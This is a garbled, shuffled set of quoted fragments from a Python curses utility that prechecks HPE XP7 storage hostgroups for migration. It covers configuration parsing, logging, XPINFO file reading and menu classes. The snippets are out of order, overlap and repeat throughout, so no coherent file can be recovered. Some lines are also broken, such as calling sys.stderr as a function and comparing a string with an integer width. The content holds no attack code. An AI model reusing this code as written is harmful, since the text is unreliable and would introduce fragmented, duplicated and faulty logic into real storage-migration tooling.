"started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict)",
": HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is ready",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window =",
"= Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr)",
"check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log",
"1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in",
"Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is ready for migration AUTHOR",
"if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select",
"current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display()",
"PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\")",
"str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update",
"logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1)",
"update the selection items list to match the new search criteria \"\"\" if",
"the items which fits in the window ### self.slice_start = 0 self.slice_len =",
"version 1.1 Curses menu structure added 1.2 Add search term criteria 1.3 Add",
"= 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions =",
"by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display))",
"what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start",
"else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name))",
"main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display()",
"box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for box_name in",
"set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self):",
"name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value)",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width =",
"nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name",
"sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"):",
"= logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\"",
"not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not",
"self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top()",
"else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{}",
"= InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select",
"box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name]",
"serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start",
"Add search term criteria 1.3 Add config file 2.0 Consistency check update 2.1",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n",
"stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL",
"in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name))",
"cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5",
"= window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position =",
"with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class",
"if self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position =",
"### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display()",
"self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\")",
"ready for migration AUTHOR : <NAME> / StorageTeam VERSION : Based on previous",
"add generate temporary horcm file and daemon to pairdisplay & check on status",
"= map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear()",
"title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching",
"\"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after",
"wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile = \"xpmig.ini\"",
"instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for",
"= 0 self.selection = selection self.search = search def update(self): \"\"\" update the",
"selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr)",
"self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def",
"= 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to",
"= 0 elif self.position >= len(self.items): self.position = len(self.items) - 1 def display(self):",
"__init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode =",
"device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {}",
"fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings",
"line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line",
"self.slice_start >= 1: ### slide slice up ### self.slice_start += n if self.slice_start",
"instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if",
"1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self):",
"self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width",
"line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection =",
"the list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name))",
"display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO:",
"current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self): return",
"width ### if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large",
"else: err_msg = \"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg",
"if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting",
"if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key",
"{} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo",
"hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict",
"update(self): \"\"\" update the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:])",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width",
"to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be",
"HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu =",
"= self.window.getmaxyx() ### fill the list to display ### self.display_list = [] for",
"{} site_dict = {} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS",
"if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else:",
"- 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width",
"display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we",
"slice is a view on the items which fits in the window ###",
"### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh",
"### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list",
"= line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection",
"= self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position += n if",
"__init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = []",
"select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn)",
"box_name in site_dict: site = site_dict[box_name] else: err_msg = \"No site defined for",
"self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\" update",
"logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK",
"set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self):",
"logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key =",
"hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the",
":: about to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: #",
"0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir",
"ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"{}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in",
"main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ###",
"cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try:",
"else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict =",
"self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ### self.display_list",
"import logging import logging.handlers import copy from ConfigParser import ConfigParser import sys import",
"<reponame>kschets/XP_migrator<gh_stars>1-10 #!/usr/bin/python \"\"\" #################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck",
"self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1)",
"1: ### slide slice up ### self.slice_start += n if self.slice_start < 0:",
"self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection =",
"too short to be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ###",
"exists\".format(box_name,hostgroup_name)) ### now we know what to display ### self.slice_start = 0 self.slice_len",
"search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr)",
"== self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if",
"XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search =",
"box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if",
"### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define",
"line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received the",
"refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile",
"the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1)",
"if len(line) >= self.width: line = line[:self.width-1] ### only add lines in the",
"by host (hba_wwn) ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name",
"instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name)",
"self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line)",
"def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start += n",
"+= n if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1",
"is a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice",
"\"\"\" #################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine",
"mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line)",
"\"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ###",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def",
"from ConfigParser import ConfigParser import sys import os import os.path import csv import",
"\"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text)",
"in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\")",
"Precheck to examine hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam",
"instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name",
"self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position",
"= hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] =",
"ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set()",
"xpmig_precheck.log TODO : add generate temporary horcm file and daemon to pairdisplay &",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object",
"break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else:",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs",
"self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0: self.position = 0",
"cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000",
"self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx()",
"or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define",
"not exists\".format(box_name,hostgroup_name)) ### now we know what to display ### self.slice_start = 0",
"the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f",
"added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to",
"boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn",
"elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels()",
"### select hostgroups by host (hba_wwn) ### select_item_dict = {} for boxpair_name in",
"logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO",
"self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) -",
"in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for",
"curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object):",
"n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start",
"items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0: self.position =",
"dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file",
"self.slice_start + self.slice_len elif n > 0: if self.slice_end < len(self.display_list) - 1:",
"1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self):",
"HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh",
"file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\")",
"index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item)",
"missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] =",
"self.position < 0: self.position = 0 elif self.position >= len(self.items): self.position = len(self.items)",
"### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{}",
"for migration AUTHOR : <NAME> / StorageTeam VERSION : Based on previous ODR",
"display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >= self.width: line",
"parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section",
"window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0",
"self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if",
"err_msg = \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg",
"# self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif",
"elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO:",
"for row in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name =",
"in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL",
"{}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site =",
"= \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh()",
"= window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = [] def display(self):",
"= window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0",
"del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window =",
"\"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width: line",
"in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for",
"\"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if",
"= \"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window =",
"self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width:",
"in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL",
"curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\")",
"for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name",
"box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr",
"consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write",
"for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\"",
"curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear()",
"hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name",
"if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item):",
"FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window",
"ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ###",
"= self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items =",
"class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title",
"log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions",
"logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE",
">= 1: ### slide slice up ### self.slice_start += n if self.slice_start <",
"= self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif",
"{}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key ==",
"key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1:",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def",
"<= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {},",
"self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ?",
"0: if self.slice_end < len(self.display_list) - 1: self.slice_end += n if self.slice_end >",
"0: self.position = 0 elif self.position >= len(self.items): self.position = len(self.items) - 1",
"- self.slice_start < 2 and self.slice_start >= 1: ### slide slice up ###",
"os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM",
"self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"import csv import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100",
"SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ###",
"in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for",
"self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if",
"n = {}\".format(self.position,n )) ### adjust slice ### if n < 0: if",
"= len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n ))",
"self.title = title self.consistent = [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1])",
